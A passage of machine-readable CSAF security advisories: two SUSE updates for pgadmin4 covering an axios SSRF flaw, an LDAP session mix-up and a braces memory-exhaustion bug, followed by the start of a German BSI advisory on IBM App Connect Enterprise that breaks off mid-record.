"text": "This update for pgadmin4 fixes the following issues:\n\n- CVE-2025-27152: axios: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-1227,SUSE-SLE-Module-Python3-15-SP6-2025-1227,openSUSE-SLE-15.6-2025-1227",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_1227-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:1227-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20251227-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:1227-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-April/038971.html"
},
{
"category": "self",
"summary": "SUSE Bug 1239308",
"url": "https://bugzilla.suse.com/1239308"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
}
],
"title": "Security update for pgadmin4",
"tracking": {
"current_release_date": "2025-04-14T07:06:34Z",
"generator": {
"date": "2025-04-14T07:06:34Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:1227-1",
"initial_release_date": "2025-04-14T07:06:34Z",
"revision_history": [
{
"date": "2025-04-14T07:06:34Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-cloud-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-desktop-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-doc-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"product": {
"name": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"product_id": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch"
}
},
{
"category": "product_version",
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"product": {
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"product_id": "system-user-pgadmin-8.5-150600.3.9.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp6"
}
}
},
{
"category": "product_name",
"name": "openSUSE Leap 15.6",
"product": {
"name": "openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:leap:15.6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-8.5-150600.3.9.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
},
"product_reference": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-cloud-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-desktop-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-doc-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch"
},
"product_reference": "pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "system-user-pgadmin-8.5-150600.3.9.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
},
"product_reference": "system-user-pgadmin-8.5-150600.3.9.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.9.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.9.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-14T07:06:34Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
}
]
}
suse-su-2025:01326-1
Vulnerability from csaf_suse
Published
2025-08-14 13:03
Modified
2025-08-14 13:03
Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)
- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user's session if two users authenticate simultaneously via ldap (bsc#1234840)
- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)
Patchnames
SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for pgadmin4",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for pgadmin4 fixes the following issues:\n\n- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)\n- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user\u0027s session if two users authenticate simultaneously via ldap (bsc#1234840)\n- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_01326-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:01326-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-202501326-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:01326-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-August/041215.html"
},
{
"category": "self",
"summary": "SUSE Bug 1224295",
"url": "https://bugzilla.suse.com/1224295"
},
{
"category": "self",
"summary": "SUSE Bug 1234840",
"url": "https://bugzilla.suse.com/1234840"
},
{
"category": "self",
"summary": "SUSE Bug 1239308",
"url": "https://bugzilla.suse.com/1239308"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-1907 page",
"url": "https://www.suse.com/security/cve/CVE-2023-1907/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-4068 page",
"url": "https://www.suse.com/security/cve/CVE-2024-4068/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
}
],
"title": "Security update for pgadmin4",
"tracking": {
"current_release_date": "2025-08-14T13:03:13Z",
"generator": {
"date": "2025-08-14T13:03:13Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:01326-1",
"initial_release_date": "2025-08-14T13:03:13Z",
"revision_history": [
{
"date": "2025-08-14T13:03:13Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product_id": "pgadmin4-4.30-150300.3.18.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product_id": "pgadmin4-4.30-150300.3.18.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-doc-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product_id": "pgadmin4-4.30-150300.3.18.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product_id": "pgadmin4-4.30-150300.3.18.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product_id": "pgadmin4-4.30-150300.3.18.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-1907",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-1907"
}
],
"notes": [
{
"category": "general",
"text": "A vulnerability was found in pgadmin. Users logging into pgAdmin running in server mode using LDAP authentication may be attached to another user\u0027s session if multiple connection attempts occur simultaneously.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-1907",
"url": "https://www.suse.com/security/cve/CVE-2023-1907"
},
{
"category": "external",
"summary": "SUSE Bug 1234840 for CVE-2023-1907",
"url": "https://bugzilla.suse.com/1234840"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-14T13:03:13Z",
"details": "important"
}
],
"title": "CVE-2023-1907"
},
{
"cve": "CVE-2024-4068",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-4068"
}
],
"notes": [
{
"category": "general",
"text": "The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends \"imbalanced braces\" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-4068",
"url": "https://www.suse.com/security/cve/CVE-2024-4068"
},
{
"category": "external",
"summary": "SUSE Bug 1224256 for CVE-2024-4068",
"url": "https://bugzilla.suse.com/1224256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-14T13:03:13Z",
"details": "important"
}
],
"title": "CVE-2024-4068"
},
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-14T13:03:13Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
}
]
}
wid-sec-w-2025-0998
Vulnerability from csaf_certbund
Published
2025-05-11 22:00
Modified
2025-08-06 22:00
Summary
IBM App Connect Enterprise Certified Container: Mehrere Schwachstellen
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
IBM App Connect Enterprise kombiniert die branchenbewährten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.
Angriff
Ein Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Dateien zu manipulieren, vertrauliche Informationen preiszugeben und einen Denial-of-Service-Zustand zu verursachen.
Betroffene Betriebssysteme
- Sonstiges
- UNIX
- Windows
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM App Connect Enterprise kombiniert die branchenbew\u00e4hrten Technologien des IBM Integration Bus mit Cloud-nativen Technologien.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Dateien zu manipulieren, vertrauliche Informationen preiszugeben und einen Denial-of-Service-Zustand zu verursachen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-0998 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-0998.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-0998 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0998"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-11",
"url": "https://www.ibm.com/support/pages/node/7233039"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-11",
"url": "https://www.ibm.com/support/pages/node/7233046"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2025-05-11",
"url": "https://www.ibm.com/support/pages/node/7233054"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7235228 vom 2025-05-30",
"url": "https://www.ibm.com/support/pages/node/7235228"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7241551 vom 2025-08-06",
"url": "https://www.ibm.com/support/pages/node/7241551"
}
],
"source_lang": "en-US",
"title": "IBM App Connect Enterprise Certified Container: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2025-08-06T22:00:00.000+00:00",
"generator": {
"date": "2025-08-07T08:50:24.902+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.4.0"
}
},
"id": "WID-SEC-W-2025-0998",
"initial_release_date": "2025-05-11T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-05-11T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-06-01T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2025-08-06T22:00:00.000+00:00",
"number": "3",
